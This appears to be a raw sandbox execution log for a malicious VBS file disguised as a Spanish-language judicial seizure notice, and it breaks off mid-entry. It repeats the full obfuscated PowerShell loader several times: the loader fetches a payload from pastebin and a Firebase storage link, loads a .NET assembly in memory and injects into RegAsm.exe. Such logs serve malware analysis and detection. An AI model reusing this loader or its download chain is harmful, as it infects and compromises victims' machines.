    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$imxyy = '0';$qfdoz = 'C:\Users\Admin\Downloads\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/V9y5Q5vv';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $zcdrz = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($zcdrz).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('1a29d97b6f85-fe19-f764-c7c7-74bbf510=nekot&aidem=tla?txt.aipoC02%ovihcrA/o/moc.topsppa.400da-oveun/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $qfdoz , 'CookieWin32.exe____________________________________________-------', $imxyy, '1', 'Roda' ));"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3600
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4752

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00.vbs"
1⤵
- Checks computer location settings
PID:2392
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bp☆G0☆e☆B5☆Hk☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆HE☆ZgBk☆G8☆eg☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBW☆Dk☆eQ☆1☆FE☆NQB2☆HY☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆egBj☆GQ☆cgB6☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆egBj☆GQ☆cgB6☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆x☆GE☆Mg☆5☆GQ☆OQ☆3☆GI☆NgBm☆Dg☆NQ☆t☆GY☆ZQ☆x☆Dk☆LQBm☆Dc☆Ng☆0☆C0☆Yw☆3☆GM☆Nw☆t☆Dc☆N☆Bi☆GI☆Zg☆1☆DE☆M☆☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆LgBh☆Gk☆c☆Bv☆EM☆M☆☆y☆CU☆bwB2☆Gk☆a☆Bj☆HI☆QQ☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆Lg☆0☆D☆☆M☆Bk☆GE☆LQBv☆HY☆ZQB1☆G4☆LwBi☆C8☆M☆B2☆C8☆bQBv☆GM☆LgBz☆Gk☆c☆Bh☆GU☆b☆Bn☆G8☆bwBn☆C4☆ZQBn☆GE☆cgBv☆HQ☆cwBl☆HM☆YQBi☆GU☆cgBp☆GY☆Lw☆v☆Do☆cwBw☆HQ☆d☆Bo☆Cc☆I☆☆s☆C☆☆J☆Bx☆GY☆Z☆Bv☆Ho☆I☆☆s☆C☆☆JwBD☆G8☆bwBr☆Gk☆ZQBX☆Gk☆bg☆z☆DI☆LgBl☆Hg☆ZQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆LQ☆t☆C0☆LQ☆t☆C0☆LQ☆n☆Cw☆I☆☆k☆Gk☆bQB4☆Hk☆eQ☆s☆C☆☆Jw☆x☆Cc☆L☆☆g☆Cc☆UgBv☆GQ☆YQ☆n☆C☆☆KQ☆p☆Ds☆';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00.vbs');powershell $KByHL;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3080
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$imxyy = '0';$qfdoz = 'C:\Users\Admin\Downloads\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/V9y5Q5vv';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $zcdrz = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($zcdrz).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('1a29d97b6f85-fe19-f764-c7c7-74bbf510=nekot&aidem=tla?txt.aipoC02%ovihcrA/o/moc.topsppa.400da-oveun/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $qfdoz , 'CookieWin32.exe____________________________________________-------', $imxyy, '1', 'Roda' ));"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:620
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3644

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00.vbs"
1⤵
- Checks computer location settings
PID:1028
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bp☆G0☆e☆B5☆Hk☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆HE☆ZgBk☆G8☆eg☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBW☆Dk☆eQ☆1☆FE☆NQB2☆HY☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆egBj☆GQ☆cgB6☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆egBj☆GQ☆cgB6☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆x☆GE☆Mg☆5☆GQ☆OQ☆3☆GI☆NgBm☆Dg☆NQ☆t☆GY☆ZQ☆x☆Dk☆LQBm☆Dc☆Ng☆0☆C0☆Yw☆3☆GM☆Nw☆t☆Dc☆N☆Bi☆GI☆Zg☆1☆DE☆M☆☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆LgBh☆Gk☆c☆Bv☆EM☆M☆☆y☆CU☆bwB2☆Gk☆a☆Bj☆HI☆QQ☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆Lg☆0☆D☆☆M☆Bk☆GE☆LQBv☆HY☆ZQB1☆G4☆LwBi☆C8☆M☆B2☆C8☆bQBv☆GM☆LgBz☆Gk☆c☆Bh☆GU☆b☆Bn☆G8☆bwBn☆C4☆ZQBn☆GE☆cgBv☆HQ☆cwBl☆HM☆YQBi☆GU☆cgBp☆GY☆Lw☆v☆Do☆cwBw☆HQ☆d☆Bo☆Cc☆I☆☆s☆C☆☆J☆Bx☆GY☆Z☆Bv☆Ho☆I☆☆s☆C☆☆JwBD☆G8☆bwBr☆Gk☆ZQBX☆Gk☆bg☆z☆DI☆LgBl☆Hg☆ZQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆LQ☆t☆C0☆LQ☆t☆C0☆LQ☆n☆Cw☆I☆☆k☆Gk☆bQB4☆Hk☆eQ☆s☆C☆☆Jw☆x☆Cc☆L☆☆g☆Cc☆UgBv☆GQ☆YQ☆n☆C☆☆KQ☆p☆Ds☆';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00.vbs');powershell $KByHL;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4228
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$imxyy = '0';$qfdoz = 'C:\Users\Admin\Downloads\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/V9y5Q5vv';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $zcdrz = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($zcdrz).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('1a29d97b6f85-fe19-f764-c7c7-74bbf510=nekot&aidem=tla?txt.aipoC02%ovihcrA/o/moc.topsppa.400da-oveun/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $qfdoz , 'CookieWin32.exe____________________________________________-------', $imxyy, '1', 'Roda' ));"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2044
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4784

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00.vbs"
1⤵
- Checks computer location settings
PID:3588
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bp☆G0☆e☆B5☆Hk☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆HE☆ZgBk☆G8☆eg☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBW☆Dk☆eQ☆1☆FE☆NQB2☆HY☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆egBj☆GQ☆cgB6☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆egBj☆GQ☆cgB6☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆x☆GE☆Mg☆5☆GQ☆OQ☆3☆GI☆NgBm☆Dg☆NQ☆t☆GY☆ZQ☆x☆Dk☆LQBm☆Dc☆Ng☆0☆C0☆Yw☆3☆GM☆Nw☆t☆Dc☆N☆Bi☆GI☆Zg☆1☆DE☆M☆☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆LgBh☆Gk☆c☆Bv☆EM☆M☆☆y☆CU☆bwB2☆Gk☆a☆Bj☆HI☆QQ☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆Lg☆0☆D☆☆M☆Bk☆GE☆LQBv☆HY☆ZQB1☆G4☆LwBi☆C8☆M☆B2☆C8☆bQBv☆GM☆LgBz☆Gk☆c☆Bh☆GU☆b☆Bn☆G8☆bwBn☆C4☆ZQBn☆GE☆cgBv☆HQ☆cwBl☆HM☆YQBi☆GU☆cgBp☆GY☆Lw☆v☆Do☆cwBw☆HQ☆d☆Bo☆Cc☆I☆☆s☆C☆☆J☆Bx☆GY☆Z☆Bv☆Ho☆I☆☆s☆C☆☆JwBD☆G8☆bwBr☆Gk☆ZQBX☆Gk☆bg☆z☆DI☆LgBl☆Hg☆ZQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆LQ☆t☆C0☆LQ☆t☆C0☆LQ☆n☆Cw☆I☆☆k☆Gk☆bQB4☆Hk☆eQ☆s☆C☆☆Jw☆x☆Cc☆L☆☆g☆Cc☆UgBv☆GQ☆YQ☆n☆C☆☆KQ☆p☆Ds☆';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00.vbs');powershell $KByHL;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4440
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$imxyy = '0';$qfdoz = 'C:\Users\Admin\Downloads\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/V9y5Q5vv';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $zcdrz = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($zcdrz).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('1a29d97b6f85-fe19-f764-c7c7-74bbf510=nekot&aidem=tla?txt.aipoC02%ovihcrA/o/moc.topsppa.400da-oveun/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $qfdoz , 'CookieWin32.exe____________________________________________-------', $imxyy, '1', 'Roda' ));"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5036
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4496

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00.vbs"
1⤵
- Checks computer location settings
PID:2968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
